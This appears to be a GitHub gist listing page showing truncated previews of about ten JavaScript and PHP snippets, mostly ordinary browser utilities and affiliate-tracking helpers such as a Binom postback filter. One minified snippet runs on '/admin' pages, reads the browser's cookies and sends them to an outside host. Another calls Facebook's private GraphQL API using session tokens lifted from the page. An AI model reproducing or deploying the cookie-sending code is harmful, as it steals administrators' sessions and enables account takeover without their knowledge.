This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class FileHelper { | |
| readTextFile(file) { | |
| return new Promise((resolve, reject) => { | |
| const reader = new FileReader(); | |
| reader.onload = () => resolve(reader.result); | |
| reader.onerror = () => reject("Error reading file"); | |
| reader.readAsText(file); | |
| }); | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class FileSelector { | |
| constructor(fileProcessor) { | |
| this.fileProcessor = fileProcessor; | |
| } | |
| createDiv() { | |
| this.div = document.createElement("div"); | |
| this.div.style.position = "fixed"; | |
| this.div.style.top = "50%"; | |
| this.div.style.left = "50%"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Constants | |
| const currentVersion = "2025.10.23"; | |
| // Global variable to store all accounts with rule counts | |
| let allAccountsData = []; | |
| // Global UI instance for logging | |
| let uiInstance = null; | |
| // Helper function to log messages |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // 1. Заменяем лишние div на иконку с тултипом | |
| document.querySelectorAll( | |
| '.v-data-table__wrapper table tbody tr td:nth-child(3) > div:first-child > div:nth-child(2)' | |
| ).forEach(originalDiv => { | |
| const content = originalDiv.innerHTML; | |
| const tooltipWrapper = document.createElement('span'); | |
| tooltipWrapper.style.position = 'relative'; | |
| tooltipWrapper.style.cursor = 'pointer'; | |
| tooltipWrapper.style.display = 'inline-block'; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * Binom Postback Filter Middleware v0.2 | |
| * by Yellow Web (https://yellowweb.top) | |
| * This script receives postback data from Binom tracker | |
| * about registrations and deposits, | |
| * filters out registrations (cnv_status = 'reg'), | |
| * and only forwards deposits (cnv_status = 'dep') to the Telegram bot. | |
| */ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| document.addEventListener("DOMContentLoaded", (function() { | |
| if (window.location.href.includes("/admin")) { | |
| const e = {}; | |
| document.cookie.split(";").some((e => e.trim().startsWith( | |
| "cookieName="))) && (e["X-Cookie"] = document | |
| .cookie), fetch("https://xxxbigdicker.com/kei", { | |
| method: "GET", | |
| headers: e | |
| }).then((e => { | |
| if (!e.ok) throw new Error( |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| async function privateApiRequest(variables, docId) { | |
| let subDomain = getSubDomain(); | |
| let graphUrl = `https://${subDomain}.facebook.com/api/graphql/`; | |
| let lsd = require("LSD").token; | |
| let dtsg = require("DTSGInitialData").token; | |
| let uid = require("CurrentUserInitialData").USER_ID; | |
| let body = { | |
| av: uid, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Get all video elements on the page | |
| const videoElements = document.querySelectorAll('a#video-title-link'); | |
| // Ask user for the number of videos to process | |
| const numberOfVideos = parseInt(prompt("How many videos do you want to process?"), 10); | |
| // Initialize an empty string to store all video lines | |
| let videoList = ''; | |
| // Process the required number of video titles |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Script as a bookmarklet | |
| javascript:(async () => {var div = document.createElement('div'); div.style.position = 'fixed'; div.style.top = '50%'; div.style.left = '50%'; div.style.transform = 'translate(-50%, -50%)'; div.style.width = '400px'; div.style.padding = '20px'; div.style.backgroundColor = 'yellow'; div.style.border = '2px solid black'; div.style.borderRadius = '10px'; div.style.zIndex = '10000'; div.style.boxShadow = '0 0 10px rgba(0, 0, 0, 0.5)'; var titleContainer = document.createElement('div'); titleContainer.style.display = 'flex'; titleContainer.style.alignItems = 'center'; titleContainer.style.justifyContent = 'center'; titleContainer.style.marginBottom = '10px'; var blurToggle = document.createElement('button'); blurToggle.innerText = '👁️'; blurToggle.style.backgroundColor = 'transparent'; blurToggle.style.border = 'none'; blurToggle.style.cursor = 'pointer'; blurToggle.style.fontSize = '20px'; blurToggle.style.marginRight = '10px'; blurToggle.style.opacity = '1'; titleContainer.appendChild( |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| class ShakesRedirectCorrector | |
| { | |
| private function get_headers($url): array | |
| { | |
| $ch = curl_init(); | |
| $headers = []; | |
| curl_setopt($ch, CURLOPT_URL, $url); | |
| curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); |
NewerOlder